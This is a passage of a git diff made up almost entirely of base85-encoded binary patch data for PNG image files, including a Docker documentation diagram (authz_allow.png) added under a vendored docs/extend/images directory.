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
Ol5(_nwX52}O8Ou06wbc@

literal 0
HcmV?d00001

diff --git a/vendor/github.com/docker/docker/docs/extend/images/authz_allow.png b/vendor/github.com/docker/docker/docs/extend/images/authz_allow.png
new file mode 100644
index 0000000000000000000000000000000000000000..f42108040bbbf9facb9fff0c320428323f061e10
GIT binary patch
literal 33505
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
